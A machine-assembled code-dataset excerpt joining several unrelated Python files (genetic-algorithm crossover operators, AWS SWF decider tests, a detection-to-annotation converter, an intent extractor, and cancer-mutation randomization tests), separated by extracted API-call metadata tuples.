"numpy.cos",
"numpy.imag",
"numpy.arctan"
] | [((643, 711), 'numpy.arctan', 'arctan', (['((self.H0 - self.H1 - Harc) / (self.W0 / 2.0 - self.W1 / 2.0))'], {}), '((self.H0 - self.H1 - Harc) / (self.W0 / 2.0 - self.W1 / 2.0))\n', (649, 711), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1477, 1515), 'numpy.array', 'array', (['[Z8a, Z8b, Z6, Z5, Z4, Z3, Z8c]'], {}), '([Z8a, Z8b, Z6, Z5, Z4, Z3, Z8c])\n', (1482, 1515), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((490, 530), 'numpy.arcsin', 'arcsin', (['(self.W0 / (2 * (Rext - self.H1)))'], {}), '(self.W0 / (2 * (Rext - self.H1)))\n', (496, 530), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((811, 822), 'numpy.cos', 'cos', (['gammam'], {}), '(gammam)\n', (814, 822), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1122, 1139), 'numpy.exp', 'exp', (['(-1.0j * hssp)'], {}), '(-1.0j * hssp)\n', (1125, 1139), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1182, 1199), 'numpy.exp', 'exp', (['(-1.0j * hssp)'], {}), '(-1.0j * hssp)\n', (1185, 1199), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1977, 1994), 'numpy.exp', 'exp', (['(-1.0j * hssp)'], {}), '(-1.0j * hssp)\n', (1980, 1994), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((587, 602), 'numpy.cos', 'cos', (['(alpham / 2)'], {}), '(alpham / 2)\n', (590, 602), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1757, 1773), 'numpy.exp', 'exp', (['(1.0j * hssp)'], {}), '(1.0j * hssp)\n', (1760, 1773), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1778, 1794), 'numpy.exp', 'exp', (['(1.0j * hssp)'], {}), '(1.0j * hssp)\n', (1781, 1794), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1799, 1815), 'numpy.exp', 'exp', (['(1.0j * hssp)'], {}), '(1.0j * hssp)\n', (1802, 1815), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1892, 1932), 'numpy.imag', 'np_imag', (['((Z3r - (Z1r - x)) / (Z6r - Z3r))'], {}), '((Z3r - (Z1r - x)) / (Z6r - Z3r))\n', (1899, 1932), True, 'from numpy import imag as np_imag\n'), ((1094, 1110), 'numpy.exp', 'exp', (['(1.0j * hssp)'], {}), '(1.0j * hssp)\n', (1097, 1110), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1154, 1170), 'numpy.exp', 'exp', (['(1.0j * hssp)'], {}), '(1.0j * hssp)\n', (1157, 1170), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1543, 1557), 'numpy.angle', 'angle', (['(Z9 - Z8)'], {}), '(Z9 - Z8)\n', (1548, 1557), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1035, 1075), 'numpy.arcsin', 'arcsin', (['(self.W3 / (2 * (Rext - self.H1)))'], {}), '(self.W3 / (2 * (Rext - self.H1)))\n', (1041, 1075), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n')] |
import numpy as np
from abc import ABC, abstractmethod
class _CrossOverBase(ABC):
def __init__(self, opt_prob):
self._opt_prob = opt_prob
self._length = opt_prob.length
@abstractmethod
def mate(self, p1, p2):
pass
class UniformCrossOver(_CrossOverBase):
def __init__(self, opt_prob):
super().__init__(opt_prob)
def mate(self, p1, p2):
bs = np.random.choice(a=[False, True], size=self._length)
child = np.array([0] * self._length)
for i in range(len(bs)):
child[i] = p1[i] if bs[i] else p2[i]
return child
class OnePointCrossOver(_CrossOverBase):
def __init__(self, opt_prob):
super().__init__(opt_prob)
def mate(self, p1, p2):
bs = np.random.randint(self._length)
child = np.array([0] * self._length)
for i in range(self._length):
child[i] = p1[i] if (i<=bs) else p2[i]
return child
class TSPCrossOver(_CrossOverBase):
def __init__(self, opt_prob):
super().__init__(opt_prob)
def mate(self, p1, p2):
if self._length > 1:
_n = np.random.randint(self._length - 1)
child = np.array([0] * self._length)
child[0:_n + 1] = p1[0:_n + 1]
unvisited = [node for node in p2 if node not in p1[0:_n + 1]]
child[_n + 1:] = unvisited
elif np.random.randint(2) == 0:
child = np.copy(p1)
else:
child = np.copy(p2)
return child | [
"numpy.random.choice",
"numpy.array",
"numpy.random.randint",
"numpy.copy"
] | [((406, 458), 'numpy.random.choice', 'np.random.choice', ([], {'a': '[False, True]', 'size': 'self._length'}), '(a=[False, True], size=self._length)\n', (422, 458), True, 'import numpy as np\n'), ((475, 503), 'numpy.array', 'np.array', (['([0] * self._length)'], {}), '([0] * self._length)\n', (483, 503), True, 'import numpy as np\n'), ((761, 792), 'numpy.random.randint', 'np.random.randint', (['self._length'], {}), '(self._length)\n', (778, 792), True, 'import numpy as np\n'), ((809, 837), 'numpy.array', 'np.array', (['([0] * self._length)'], {}), '([0] * self._length)\n', (817, 837), True, 'import numpy as np\n'), ((1131, 1166), 'numpy.random.randint', 'np.random.randint', (['(self._length - 1)'], {}), '(self._length - 1)\n', (1148, 1166), True, 'import numpy as np\n'), ((1187, 1215), 'numpy.array', 'np.array', (['([0] * self._length)'], {}), '([0] * self._length)\n', (1195, 1215), True, 'import numpy as np\n'), ((1386, 1406), 'numpy.random.randint', 'np.random.randint', (['(2)'], {}), '(2)\n', (1403, 1406), True, 'import numpy as np\n'), ((1433, 1444), 'numpy.copy', 'np.copy', (['p1'], {}), '(p1)\n', (1440, 1444), True, 'import numpy as np\n'), ((1479, 1490), 'numpy.copy', 'np.copy', (['p2'], {}), '(p2)\n', (1486, 1490), True, 'import numpy as np\n')] |
import logging
import attr
import boto3
import botocore.stub
import pytest
import decision_tasks
import pyflow
from pyflow import workflow_state as ws
@pytest.fixture
def initialize_logging():
logging.basicConfig()
pyflow.logger.setLevel(logging.INFO)
pytestmark = pytest.mark.usefixtures('initialize_logging')
class StringTransformer(pyflow.Workflow):
NAME = 'StringTransformer'
VERSION = '1.0'
string_upcase = pyflow.LambdaDescriptor('string_upcase')
string_reverse = pyflow.LambdaDescriptor('string_reverse')
subscribe_topic = pyflow.ActivityDescriptor('subscribe_topic_activity', 'v1', task_list='subscription-activities')
string_concat = pyflow.ChildWorkflowDescriptor('StringConcatter', '1.0',
lambda_role='arn:aws:iam::528461152743:role/swf-lambda')
def run(self, workflow_input):
# for loops work. In this case upcased will contain a list of futures
upcased = []
for s in workflow_input:
upcased.append(self.string_upcase(s))
# demonstrate error handling
try:
# pass a number where a string is expected
self.string_upcase(42).result()
assert False, "Shouldn't get to here"
except pyflow.InvocationFailedException:
pass
# list comprehensions as well
reversed_strs = [self.string_reverse(s.result()) for s in upcased]
# Sleep for 5 seconds
self.swf.sleep(5)
# Wait for all futures to finish before proceeding. This normally isn't necessary since just calling result()
# on each future would accomplish the same thing.
self.swf.wait_for_all(reversed_strs)
# Try invoking an activity
subscription = self.subscribe_topic({'email': '<EMAIL>'})
concatted = self.string_concat([s.result() for s in reversed_strs]).result()
subscription.result()
return concatted
class StringConcatter(pyflow.Workflow):
NAME = 'StringConcatter'
VERSION = '1.0'
OPTIONS = {'lambdaRole': 'arn:aws:iam::528461152743:role/swf-lambda'}
def run(self, workflow_input):
return self.swf.invoke_lambda('string_concat', workflow_input).result()
@pytest.fixture
def swf_client():
"""Returns a mock boto3 SWF client. See botocore.stub.Stubber docstring for how to use it"""
return botocore.stub.Stubber(boto3.client('swf'))
@pytest.fixture
def decider(swf_client):
return pyflow.Decider([StringTransformer, StringConcatter],
domain='test-domain', task_list='string-transformer-decider',
identity='string transformer decider', client=swf_client)
@attr.s
class DeciderTestCase(object):
name = attr.ib()
decision_task = attr.ib()
expected_decisions = attr.ib()
process_decision_task_test_cases = [
DeciderTestCase('decision_task00', decision_tasks.decision_task00, [
{'decisionType': 'ScheduleLambdaFunction',
'scheduleLambdaFunctionDecisionAttributes': {
'id': 'lambda1',
'name': 'string_upcase',
'input': '"Hello"'}
},
{'decisionType': 'ScheduleLambdaFunction',
'scheduleLambdaFunctionDecisionAttributes': {
'id': 'lambda2',
'name': 'string_upcase',
'input': '" "'}
},
{'decisionType': 'ScheduleLambdaFunction',
'scheduleLambdaFunctionDecisionAttributes': {
'id': 'lambda3',
'name': 'string_upcase',
'input': '"World"'}
},
{'decisionType': 'ScheduleLambdaFunction',
'scheduleLambdaFunctionDecisionAttributes': {
'id': 'lambda4',
'name': 'string_upcase',
'input': '42'}
}
]),
# Continued from task00, but lambda2 invocation has completed
DeciderTestCase('decision_task01', decision_tasks.decision_task01, []),
# Now lambda1 has completed, and lambda4 has failed
DeciderTestCase('decision_task02', decision_tasks.decision_task02, [
{'decisionType': 'ScheduleLambdaFunction',
'scheduleLambdaFunctionDecisionAttributes': {
'id': 'lambda5',
'name': 'string_reverse',
'input': '"HELLO"'}
},
{'decisionType': 'ScheduleLambdaFunction',
'scheduleLambdaFunctionDecisionAttributes': {
'id': 'lambda6',
'name': 'string_reverse',
'input': '" "'}
}
]),
# Now lambda3 has completed
DeciderTestCase('decision_task03', decision_tasks.decision_task03, [
{'decisionType': 'ScheduleLambdaFunction',
'scheduleLambdaFunctionDecisionAttributes': {
'id': 'lambda7',
'name': 'string_reverse',
'input': '"WORLD"'}
},
{'decisionType': 'StartTimer',
'startTimerDecisionAttributes': {
'startToFireTimeout': "5",
'timerId': "sleep1"}
}
]),
# lambda5 and lambda6 completed
DeciderTestCase('decision_task04', decision_tasks.decision_task04, []),
# lambda7 completed
DeciderTestCase('decision_task05', decision_tasks.decision_task05, []),
# sleep1 completed
DeciderTestCase('decision_task06', decision_tasks.decision_task06, [
{'decisionType': 'ScheduleActivityTask',
'scheduleActivityTaskDecisionAttributes': {
'activityId': 'activity1',
'activityType': {'name': 'subscribe_topic_activity', 'version': 'v1'},
'input': '{"email": "<EMAIL>"}',
'taskList': {'name': 'subscription-activities'}}
},
{'decisionType': 'StartChildWorkflowExecution',
'startChildWorkflowExecutionDecisionAttributes': {
'workflowId': 'child_workflow1',
'workflowType': {'name': 'StringConcatter', 'version': '1.0'},
'input': '["OLLEH", " ", "DLROW"]',
'lambdaRole': 'arn:aws:iam::528461152743:role/swf-lambda'}
}
]),
# activity1 completed
DeciderTestCase('decision_task07', decision_tasks.decision_task07, []),
# This is the first decision task for the StringConcatter child workflow
DeciderTestCase('decision_task08', decision_tasks.decision_task08, [
{'decisionType': 'ScheduleLambdaFunction',
'scheduleLambdaFunctionDecisionAttributes': {
'id': 'lambda1',
'name': 'string_concat',
'input': '["OLLEH", " ", "DLROW"]'}
}
]),
# In parent, notifies that child workflow started
DeciderTestCase('decision_task09', decision_tasks.decision_task09, []),
# lambda1 in the child workflow completed
DeciderTestCase('decision_task10', decision_tasks.decision_task10, [
{'decisionType': 'CompleteWorkflowExecution',
'completeWorkflowExecutionDecisionAttributes': {
'result': '"OLLEH DLROW"'}
}
]),
# child_workflow1 completed
DeciderTestCase('decision_task11', decision_tasks.decision_task11, [
{'decisionType': 'CompleteWorkflowExecution',
'completeWorkflowExecutionDecisionAttributes': {
'result': '"OLLEH DLROW"'}
}
])
]
@pytest.mark.parametrize('test_case', process_decision_task_test_cases,
ids=[tc.name for tc in process_decision_task_test_cases])
def test_process_decision_task(decider, test_case):
decision_helper = decider.process_decision_task(test_case.decision_task)
assert test_case.expected_decisions == decision_helper.decisions
def test_process_decision_task_cumulative(decider):
"""Like test_process_decision_task, but process all decision tasks in one decider instance"""
for test_case in process_decision_task_test_cases:
decision_helper = decider.process_decision_task(test_case.decision_task)
assert test_case.expected_decisions == decision_helper.decisions, test_case.name
def test_process_decision_task_with_workflow_failure(decider):
decision_helper = decider.process_decision_task(decision_tasks.decision_task02_error)
assert len(decision_helper.decisions) == 1
decision = decision_helper.decisions[0]
assert decision['decisionType'] == 'FailWorkflowExecution'
assert decision['failWorkflowExecutionDecisionAttributes']['reason']
assert decision['failWorkflowExecutionDecisionAttributes']['details']
def test_invalid_workflow_input(decider):
"""Validate correct response to invalid JSON being passed as workflow input"""
# The workflow should fail, but the decider itself shouldn't fail.
decision_helper = decider.process_decision_task(decision_tasks.invalid_workflow_input)
assert decision_helper.decisions[0]['decisionType'] == 'FailWorkflowExecution'
def test_invalid_activity_output(decider):
"""Validate correct response to an activity task returning invalid JSON string"""
# The correct behavior is for the task to fail, but decider and workflow to continue
decision_helper = decider.process_decision_task(decision_tasks.invalid_activity_output)
assert decision_helper.workflow_state.invocation_states['activity1'].state == ws.InvocationState.FAILED
def test_invalid_child_workflow_output(decider):
"Validate correct response to a child workflow returning invalid JSON string"
decision_helper = decider.process_decision_task(decision_tasks.invalid_child_workflow_output)
assert decision_helper.workflow_state.invocation_states['child_workflow1'].state == ws.InvocationState.FAILED
| [
"logging.basicConfig",
"pyflow.logger.setLevel",
"boto3.client",
"pyflow.Decider",
"pyflow.LambdaDescriptor",
"pytest.mark.parametrize",
"pytest.mark.usefixtures",
"pyflow.ActivityDescriptor",
"pyflow.ChildWorkflowDescriptor",
"attr.ib"
] | [((279, 324), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""initialize_logging"""'], {}), "('initialize_logging')\n", (302, 324), False, 'import pytest\n'), ((7287, 7420), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""test_case"""', 'process_decision_task_test_cases'], {'ids': '[tc.name for tc in process_decision_task_test_cases]'}), "('test_case', process_decision_task_test_cases, ids=\n [tc.name for tc in process_decision_task_test_cases])\n", (7310, 7420), False, 'import pytest\n'), ((201, 222), 'logging.basicConfig', 'logging.basicConfig', ([], {}), '()\n', (220, 222), False, 'import logging\n'), ((227, 263), 'pyflow.logger.setLevel', 'pyflow.logger.setLevel', (['logging.INFO'], {}), '(logging.INFO)\n', (249, 263), False, 'import pyflow\n'), ((441, 481), 'pyflow.LambdaDescriptor', 'pyflow.LambdaDescriptor', (['"""string_upcase"""'], {}), "('string_upcase')\n", (464, 481), False, 'import pyflow\n'), ((503, 544), 'pyflow.LambdaDescriptor', 'pyflow.LambdaDescriptor', (['"""string_reverse"""'], {}), "('string_reverse')\n", (526, 544), False, 'import pyflow\n'), ((568, 669), 'pyflow.ActivityDescriptor', 'pyflow.ActivityDescriptor', (['"""subscribe_topic_activity"""', '"""v1"""'], {'task_list': '"""subscription-activities"""'}), "('subscribe_topic_activity', 'v1', task_list=\n 'subscription-activities')\n", (593, 669), False, 'import pyflow\n'), ((686, 804), 'pyflow.ChildWorkflowDescriptor', 'pyflow.ChildWorkflowDescriptor', (['"""StringConcatter"""', '"""1.0"""'], {'lambda_role': '"""arn:aws:iam::528461152743:role/swf-lambda"""'}), "('StringConcatter', '1.0', lambda_role=\n 'arn:aws:iam::528461152743:role/swf-lambda')\n", (716, 804), False, 'import pyflow\n'), ((2498, 2679), 'pyflow.Decider', 'pyflow.Decider', (['[StringTransformer, StringConcatter]'], {'domain': '"""test-domain"""', 'task_list': '"""string-transformer-decider"""', 'identity': '"""string transformer decider"""', 'client': 'swf_client'}), "([StringTransformer, StringConcatter], domain='test-domain',\n task_list='string-transformer-decider', identity=\n 'string transformer decider', client=swf_client)\n", (2512, 2679), False, 'import pyflow\n'), ((2775, 2784), 'attr.ib', 'attr.ib', ([], {}), '()\n', (2782, 2784), False, 'import attr\n'), ((2805, 2814), 'attr.ib', 'attr.ib', ([], {}), '()\n', (2812, 2814), False, 'import attr\n'), ((2840, 2849), 'attr.ib', 'attr.ib', ([], {}), '()\n', (2847, 2849), False, 'import attr\n'), ((2423, 2442), 'boto3.client', 'boto3.client', (['"""swf"""'], {}), "('swf')\n", (2435, 2442), False, 'import boto3\n')] |
# INTEL CONFIDENTIAL
#
# Copyright (C) 2021 Intel Corporation
#
# This software and the related documents are Intel copyrighted materials, and
# your use of them is governed by the express license under which they were provided to
# you ("License"). Unless the License provides otherwise, you may not use, modify, copy,
# publish, distribute, disclose or transmit this software or the related documents
# without Intel's prior written permission.
#
# This software and the related documents are provided as is,
# with no express or implied warranties, other than those that are expressly stated
# in the License.
import abc
from typing import Any, List
import numpy as np
from ote_sdk.entities.annotation import (
Annotation,
AnnotationSceneEntity,
AnnotationSceneKind,
)
from ote_sdk.entities.id import ID
from ote_sdk.entities.label import LabelEntity
from ote_sdk.entities.scored_label import ScoredLabel
from ote_sdk.entities.shapes.rectangle import Rectangle
from ote_sdk.utils.time_utils import now
class IPredictionToAnnotationConverter(metaclass=abc.ABCMeta):
@abc.abstractmethod
def convert_to_annotation(self, predictions: Any) -> AnnotationSceneEntity:
"""
Convert raw predictions to AnnotationScene format.
:param predictions: Raw predictions from the model
:return: annotation object containing the shapes
obtained from the raw predictions.
"""
raise NotImplementedError
class DetectionToAnnotationConverter(IPredictionToAnnotationConverter):
"""
Converts Object Detections to Annotations
"""
def __init__(self, labels: List[LabelEntity]):
self.label_map = dict(enumerate(labels))
def convert_to_annotation(self, predictions: np.ndarray) -> AnnotationSceneEntity:
"""
Converts a set of predictions into an AnnotationScene object
:param predictions: Prediction with shape [num_predictions, 6] or
[num_predictions, 7]
Supported detection formats are
* [label, confidence, x1, y1, x2, y2]
* [_, label, confidence, x1, y1, x2, y2]
.. note::
`label` can be any integer that can be mapped to `self.labels`
`confidence` should be a value between 0 and 1
`x1`, `x2`, `y1` and `y2` are expected to be normalized.
:returns AnnotationScene: AnnotationScene Object containing the boxes
obtained from the prediction
"""
annotations = self.__convert_to_annotations(predictions)
# media_identifier = ImageIdentifier(image_id=ID())
annotation_scene = AnnotationSceneEntity(
id=ID(),
kind=AnnotationSceneKind.PREDICTION,
editor="ote",
creation_date=now(),
annotations=annotations,
)
return annotation_scene
def __convert_to_annotations(self, predictions: np.ndarray) -> List[Annotation]:
"""
Converts a list of Detections to OTE SDK Annotation objects
:param predictions: A list of predictions with shape [num_prediction, 6] or
[num_predictions, 7]
:returns: A list of Annotation objects with Rectangle shapes
:raises ValueError: This error is raised if the shape of prediction is not
(n, 7) or (n, 6)
"""
annotations = list()
if predictions.shape[1:] < (6,) or predictions.shape[1:] > (7,):
raise ValueError(
f"Shape of prediction is not expected, expected (n, 7) or (n, 6) "
f"got {predictions.shape}"
)
for prediction in predictions:
if prediction.shape == (7,):
# Some OpenVINO models use an output shape of [7,]
# If this is the case, skip the first value as it is not used
prediction = prediction[1:]
label = int(prediction[0])
confidence = prediction[1]
scored_label = ScoredLabel(self.label_map[label], confidence)
annotations.append(
Annotation(
Rectangle(
prediction[2], prediction[3], prediction[4], prediction[5]
),
labels=[scored_label],
)
)
return annotations
| [
"ote_sdk.utils.time_utils.now",
"ote_sdk.entities.id.ID",
"ote_sdk.entities.shapes.rectangle.Rectangle",
"ote_sdk.entities.scored_label.ScoredLabel"
] | [((4058, 4104), 'ote_sdk.entities.scored_label.ScoredLabel', 'ScoredLabel', (['self.label_map[label]', 'confidence'], {}), '(self.label_map[label], confidence)\n', (4069, 4104), False, 'from ote_sdk.entities.scored_label import ScoredLabel\n'), ((2704, 2708), 'ote_sdk.entities.id.ID', 'ID', ([], {}), '()\n', (2706, 2708), False, 'from ote_sdk.entities.id import ID\n'), ((2811, 2816), 'ote_sdk.utils.time_utils.now', 'now', ([], {}), '()\n', (2814, 2816), False, 'from ote_sdk.utils.time_utils import now\n'), ((4185, 4254), 'ote_sdk.entities.shapes.rectangle.Rectangle', 'Rectangle', (['prediction[2]', 'prediction[3]', 'prediction[4]', 'prediction[5]'], {}), '(prediction[2], prediction[3], prediction[4], prediction[5])\n', (4194, 4254), False, 'from ote_sdk.entities.shapes.rectangle import Rectangle\n')] |
from os.path import join, expanduser
from threading import Lock
from ovos_utils.log import LOG
from ovos_utils.xdg_utils import xdg_data_home
from padatious import IntentContainer
from ovos_plugin_manager.intents import IntentExtractor, IntentPriority, IntentDeterminationStrategy
class PadatiousExtractor(IntentExtractor):
keyword_based = False
def __init__(self, config=None,
strategy=IntentDeterminationStrategy.SEGMENT_REMAINDER,
priority=IntentPriority.MEDIUM_HIGH,
segmenter=None):
super().__init__(config, strategy=strategy,
priority=priority, segmenter=segmenter)
data_dir = expanduser(self.config.get("data_dir", xdg_data_home()))
cache_dir = join(data_dir, "padatious")
self.lock = Lock()
self.container = IntentContainer(cache_dir)
def detach_intent(self, intent_name):
if intent_name in self.registered_intents:
LOG.debug("Detaching padatious intent: " + intent_name)
with self.lock:
self.container.remove_intent(intent_name)
super().detach_intent(intent_name)
def register_entity(self, entity_name, samples=None, reload_cache=True):
samples = samples or [entity_name]
super().register_entity(entity_name, samples)
with self.lock:
self.container.add_entity(entity_name, samples,
reload_cache=reload_cache)
def register_intent(self, intent_name, samples=None, reload_cache=True):
samples = samples or [intent_name]
super().register_intent(intent_name, samples)
with self.lock:
self.container.add_intent(intent_name, samples,
reload_cache=reload_cache)
self.registered_intents.append(intent_name)
def register_entity_from_file(self, entity_name, file_name,
reload_cache=True):
super().register_entity_from_file(entity_name, file_name)
with self.lock:
self.container.load_entity(entity_name, file_name,
reload_cache=reload_cache)
def register_intent_from_file(self, intent_name, file_name,
single_thread=True, timeout=120,
reload_cache=True, force_training=True):
super().register_intent_from_file(intent_name, file_name)
try:
with self.lock:
self.container.load_intent(intent_name, file_name,
reload_cache=reload_cache)
self.registered_intents.append(intent_name)
success = self._train(single_thread=single_thread,
timeout=timeout,
force_training=force_training)
if success:
LOG.debug(file_name + " trained successfully")
else:
LOG.error(file_name + " FAILED TO TRAIN")
except Exception as e:
LOG.exception(e)
def _get_remainder(self, intent, utterance):
if intent["name"] in self.intent_samples:
return self.get_utterance_remainder(
utterance, samples=self.intent_samples[intent["name"]])
return utterance
def calc_intent(self, utterance, min_conf=0.0):
min_conf = min_conf or self.config.get("padatious_min_conf", 0.35)
utterance = utterance.strip().lower()
with self.lock:
intent = self.container.calc_intent(utterance).__dict__
if intent["conf"] < min_conf:
return {"intent_type": "unknown", "entities": {}, "conf": 0,
"intent_engine": "padatious",
"utterance": utterance, "utterance_remainder": utterance}
intent["utterance_remainder"] = self._get_remainder(intent, utterance)
intent["entities"] = intent.pop("matches")
intent["intent_engine"] = "padatious"
intent["intent_type"] = intent.pop("name")
intent["utterance"] = intent.pop("sent")
if isinstance(intent["utterance"], list):
intent["utterance"] = " ".join(intent["utterance"])
return intent
def _train(self, single_thread=True, timeout=120, force_training=True):
with self.lock:
return self.container.train(single_thread=single_thread,
timeout=timeout,
force=force_training,
debug=True)
| [
"threading.Lock",
"os.path.join",
"ovos_utils.log.LOG.error",
"ovos_utils.log.LOG.exception",
"padatious.IntentContainer",
"ovos_utils.xdg_utils.xdg_data_home",
"ovos_utils.log.LOG.debug"
] | [((764, 791), 'os.path.join', 'join', (['data_dir', '"""padatious"""'], {}), "(data_dir, 'padatious')\n", (768, 791), False, 'from os.path import join, expanduser\n'), ((812, 818), 'threading.Lock', 'Lock', ([], {}), '()\n', (816, 818), False, 'from threading import Lock\n'), ((844, 870), 'padatious.IntentContainer', 'IntentContainer', (['cache_dir'], {}), '(cache_dir)\n', (859, 870), False, 'from padatious import IntentContainer\n'), ((977, 1032), 'ovos_utils.log.LOG.debug', 'LOG.debug', (["('Detaching padatious intent: ' + intent_name)"], {}), "('Detaching padatious intent: ' + intent_name)\n", (986, 1032), False, 'from ovos_utils.log import LOG\n'), ((726, 741), 'ovos_utils.xdg_utils.xdg_data_home', 'xdg_data_home', ([], {}), '()\n', (739, 741), False, 'from ovos_utils.xdg_utils import xdg_data_home\n'), ((2926, 2972), 'ovos_utils.log.LOG.debug', 'LOG.debug', (["(file_name + ' trained successfully')"], {}), "(file_name + ' trained successfully')\n", (2935, 2972), False, 'from ovos_utils.log import LOG\n'), ((3007, 3048), 'ovos_utils.log.LOG.error', 'LOG.error', (["(file_name + ' FAILED TO TRAIN')"], {}), "(file_name + ' FAILED TO TRAIN')\n", (3016, 3048), False, 'from ovos_utils.log import LOG\n'), ((3093, 3109), 'ovos_utils.log.LOG.exception', 'LOG.exception', (['e'], {}), '(e)\n', (3106, 3109), False, 'from ovos_utils.log import LOG\n')] |
# fix problems with pythons terrible import system
import os
import sys
file_dir = os.path.dirname(os.path.realpath(__file__))
#sys.path.append(os.path.join(file_dir, '../bin/'))
sys.path.append(os.path.join(file_dir, '..'))
import prob2020.console.randomization_test as pt
import prob2020.python.utils as utils
import prob2020.python.mutation_context as mc
import numpy as np
def test_ctnnb1_main():
opts = {'input': os.path.join(file_dir, 'data/CTNNB1.fa'),
'bed': os.path.join(file_dir, 'data/CTNNB1.bed'),
'mutations': os.path.join(file_dir, 'data/CTNNB1_mutations.txt'),
'output': os.path.join(file_dir, 'output/CTNNB1_output.txt'),
'context': 1,
'use_unmapped': False,
'tsg_score': .1,
'recurrent': 3,
'fraction': .02,
'score_dir': os.path.join(file_dir, 'data/scores'),
'processes': 0,
'num_iterations': 10000,
'stop_criteria': 100,
'recurrent_pseudo_count': 0,
'unique': 0,
'seed': None,
'kind': 'oncogene'}
# single nucleotide context
result = pt.main(opts)
assert result.ix[0, 'entropy p-value'] < 0.001, 'CTNNB1 should have a very low p-value ({0}>.001)'.format(result[0][2])
# di-nucleotide case
opts['context'] = 2
result = pt.main(opts)
assert result.ix[0, 'entropy p-value'] < 0.001, 'CTNNB1 should have a very low p-value ({0}>.001)'.format(result[0][2])
# no context case
opts['context'] = 0
result = pt.main(opts)
assert result.ix[0, 'entropy p-value'] < 0.001, 'CTNNB1 should have a very low p-value ({0}>.001)'.format(result[0][2])
def test_ctnnb1_get_aa_mut_info():
import pysam
from prob2020.python.gene_sequence import GeneSequence
# read fasta
ctnnb1_fasta = os.path.join(file_dir, 'data/CTNNB1.fa')
gene_fa = pysam.Fastafile(ctnnb1_fasta)
gs = GeneSequence(gene_fa, nuc_context=1)
# read CTNNB1 bed file
ctnnb1_bed = os.path.join(file_dir, 'data/CTNNB1.bed')
bed_list = [b for b in utils.bed_generator(ctnnb1_bed)]
gs.set_gene(bed_list[0])
# specify mutation
coding_pos = [0]
somatic_base = ['C']
# check mutation info
aa_info = mc.get_aa_mut_info(coding_pos, somatic_base, gs)
ref_codon_msg = 'First codon should be start codon ({0})'.format(aa_info['Reference Codon'][0])
assert aa_info['Reference Codon'][0] == 'ATG', ref_codon_msg
assert aa_info['Somatic Codon'][0] == 'CTG', 'First "A" should be replaced with a "C"'
assert aa_info['Codon Pos'][0] == 0, 'Start codon should be position 0'
def test_100genes_main():
opts = {'input': os.path.join(file_dir, 'data/100genes.fa'),
'bed': os.path.join(file_dir, 'data/100genes.bed'),
'mutations': os.path.join(file_dir, 'data/100genes_mutations.txt'),
'output': os.path.join(file_dir, 'output/100genes_position_single_nuc_output.txt'),
'context': 1,
'tsg_score': .1,
'recurrent': 3,
'fraction': .02,
'use_unmapped': False,
'processes': 0,
'num_iterations': 1000,
'stop_criteria': 100,
'score_dir': os.path.join(file_dir, 'data/scores'),
'recurrent_pseudo_count': 0,
'unique': False,
'seed': None,
'kind': 'oncogene'}
# single nucleotide context
result = pt.main(opts)
#tested_result = result[result['Performed Recurrency Test']==1]
num_ent_sig = np.sum(result['entropy BH q-value'] < .1)
assert num_ent_sig < 9, 'Few of the 100 test genes should not be significant ({0})'.format(num_ent_sig)
# no context case
opts['context'] = 0
opts['output'] = os.path.join(file_dir, 'output/100genes_position_no_context_output.txt')
result = pt.main(opts)
#tested_result = result[result['Performed Recurrency Test']==1]
num_ent_sig = np.sum(result['entropy BH q-value'] < .1)
assert num_ent_sig < 9, 'Few of the 100 test genes should not be significant ({0})'.format(num_ent_sig)
# di-nucleotide context
opts['context'] = 2
opts['output'] = os.path.join(file_dir, 'output/100genes_position_dinuc_output.txt')
result = pt.main(opts)
#tested_result = result[result['Performed Recurrency Test']==1]
num_ent_sig = np.sum(result['entropy BH q-value'] < .1)
assert num_ent_sig < 9, 'Few of the 100 test genes should not be significant ({0})'.format(num_ent_sig)
if __name__ == '__main__':
test_100genes_main()
| [
"pysam.Fastafile",
"prob2020.console.randomization_test.main",
"os.path.join",
"os.path.realpath",
"numpy.sum",
"prob2020.python.mutation_context.get_aa_mut_info",
"prob2020.python.utils.bed_generator",
"prob2020.python.gene_sequence.GeneSequence"
] | [((99, 125), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (115, 125), False, 'import os\n'), ((195, 223), 'os.path.join', 'os.path.join', (['file_dir', '""".."""'], {}), "(file_dir, '..')\n", (207, 223), False, 'import os\n'), ((1160, 1173), 'prob2020.console.randomization_test.main', 'pt.main', (['opts'], {}), '(opts)\n', (1167, 1173), True, 'import prob2020.console.randomization_test as pt\n'), ((1361, 1374), 'prob2020.console.randomization_test.main', 'pt.main', (['opts'], {}), '(opts)\n', (1368, 1374), True, 'import prob2020.console.randomization_test as pt\n'), ((1559, 1572), 'prob2020.console.randomization_test.main', 'pt.main', (['opts'], {}), '(opts)\n', (1566, 1572), True, 'import prob2020.console.randomization_test as pt\n'), ((1847, 1887), 'os.path.join', 'os.path.join', (['file_dir', '"""data/CTNNB1.fa"""'], {}), "(file_dir, 'data/CTNNB1.fa')\n", (1859, 1887), False, 'import os\n'), ((1902, 1931), 'pysam.Fastafile', 'pysam.Fastafile', (['ctnnb1_fasta'], {}), '(ctnnb1_fasta)\n', (1917, 1931), False, 'import pysam\n'), ((1941, 1977), 'prob2020.python.gene_sequence.GeneSequence', 'GeneSequence', (['gene_fa'], {'nuc_context': '(1)'}), '(gene_fa, nuc_context=1)\n', (1953, 1977), False, 'from prob2020.python.gene_sequence import GeneSequence\n'), ((2023, 2064), 'os.path.join', 